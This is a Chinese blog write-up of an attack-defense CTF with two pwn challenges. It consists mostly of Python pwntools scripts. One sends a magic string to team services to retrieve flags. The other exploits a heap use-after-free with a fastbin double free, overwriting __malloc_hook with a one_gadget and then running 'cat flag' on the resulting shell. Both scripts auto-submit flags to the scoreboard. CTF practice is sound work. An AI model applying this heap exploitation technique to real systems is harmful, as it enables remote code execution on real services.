登录后台

页面导航

本文编写于 181 天前,最后修改于 86 天前,其中某些信息可能已经过时。

pwn1

题目总体比较复杂,有个strcmp函数,对输入的字符串base64加密,然后和给定的对比,成功会输出flag

应该还有其它漏洞,没细看。。

自动攻击脚本:

from pwn import *
import requests
import re
import json
import time
def upload_flag(flag):
    login_url = 'http://127.0.0.1:8080/login'
    req = requests.Session()
    nonce = re.search(r'<input type="hidden" name="nonce" value="(.+)">',req.get(login_url).text).group(1)

    data = {
        'name':'team_name',
        'password':'team_passwd',
        'nonce':nonce
    }
    req.post(url=login_url,data=data)

    flag = {"challenge_id":1,"submission":flag}
    csrf_nonce = re.search(r'var csrf_nonce = "(.+)";',req.get('http://127.0.0.1:8080/challenges').text).group(1)
    print(csrf_nonce)
    headers = {'CSRF-Token':csrf_nonce,
               'Content-Type': 'application/json'
               }
    print(req.post(url='http://127.0.0.1:8080/api/v1/challenges/attempt',data=json.dumps(flag),headers=headers).text)
    time.sleep(5)

port =[10380,10480,10680,10780,10880,11080,11180,11280,11380,11480,11680,11780,11880,12080,12380,12480,12580,12680,12780,12880,10580,10280,12180,11980,12280,10980]


for i in range(len(port)):
    try:

        sh = remote('127.0.0.1',port[i])
        sh.recvuntil('Good luck!\n',timeout=5)
        sh.send('iwanaflag\x00',)
        flag = sh.recv(0x2a)
        print flag
        if 'flag' in flag:
            upload_flag(flag)
        sh.close()
    except:
        continue

pwn2

uaf漏洞。用onegadget攻击malloc_hook,需要用realloc调节栈帧

自动攻击脚本,后期服务器崩了,没测试完美

from pwn import *

import requests
import re
import json
import time
def upload_flag(flag):
    login_url = 'http://127.0.0.1:8080/login'
    req = requests.Session()
    nonce = re.search(r'<input type="hidden" name="nonce" value="(.+)">',req.get(login_url).text).group(1)

    data = {
        'name':'team_name',
        'password':'team_passwd',
        'nonce':nonce
    }
    req.post(url=login_url,data=data)

    flag = {"challenge_id":2,"submission":flag}
    csrf_nonce = re.search(r'var csrf_nonce = "(.+)";',req.get('http://127.0.0.1:8080/challenges').text).group(1)
    print(csrf_nonce)
    headers = {'CSRF-Token':csrf_nonce,
               'Content-Type': 'application/json'
               }
    print(req.post(url='http://127.0.0.1:8080/api/v1/challenges/attempt',data=json.dumps(flag),headers=headers).text)
    time.sleep(5)

port =[10380,10480,10680,10780,10880,11080,11180,11280,11380,11480,11680,11780,11880,12080,12380,12480,12580,12680,12780,12880,10580,10280,12180,11980,12280,10980]


def pwn(port):
    elf = ELF('pwn')
    sh = remote('127.0.0.1',port)
    libc = ELF('libc-2.23.so')
    def add(idx,size,data):
        sh.sendlineafter('Your Choice\n',str(1))
        sh.recvuntil('index>> ')
        sh.sendline(str(idx))
        sh.recvuntil('size>> ')
        sh.sendline(str(size))
        sh.recvuntil('name>> ')
        sh.send(str(data))
    def show(idx):
        sh.sendlineafter('Your Choice\n',str(5))
        sh.recvuntil('index>> ')
        sh.sendline(str(idx))
    def edit(idx,data):
        sh.sendlineafter('Your Choice\n',str(3))
        sh.recvuntil('index>> ')
        sh.sendline(str(idx))
        sh.recvuntil('name>> ')
        sh.send(str(data))
    def delete(idx):
        sh.sendlineafter('Your Choice\n',str(2))
        sh.recvuntil('index>> ')
        sh.sendline(str(idx))
    add(0,0x80,'a'*0x80)
    add(7,0x80,'a'*0x80)
    add(1,0x68,'a'*0x68)
    add(2,0x68,'a'*0x68)
    add(3,0x68,'a'*0x68)
    delete(0)
    show(0)
    libc_base = u64(sh.recv(6).ljust(8,'\x00'),timeout=5) - 0x3c4b78
    delete(1)
    delete(2)
    delete(1)
    add(4,0x68,p64(libc_base+libc.symbols['__malloc_hook']-0x23)*2)
    log.success('libc_base: '+hex(libc_base))
    add(5,0x68,'a'*0x68)
    add(6,0x68,'a'*0x68)
    delete(7)
    add(8,0x68,'a'*11+p64(libc_base+0x4526a)+p64(libc_base+libc.symbols['__libc_realloc']+0x8))
    sh.sendlineafter('ice\n',str(1))
    sh.recvuntil('index>> ')
    sh.sendline(str(10))
    sh.recvuntil('size>> ')
    sh.sendline(str(10))
    sh.sendline('cat flag')
    flag = sh.recv(timeout=5)
    print flag
    return flag

port =[20280,20380,20480,20680,20780,20880,20980,21080,21180,21280,21380,21580,21680,21780,21880,21980,22180,22280,22380,22480,22580,22680,22780,22880,22080,21480,20580]


for i in range(len(port)):
    try:
        flag = pwn(port[i])
        if 'flag' in flag:
            upload_flag(flag)
        sh.close()
    except:
        continue

总结

这次总体还算可以,后期服务器有点崩,patch是另一位pwn师傅在做,做的也不错。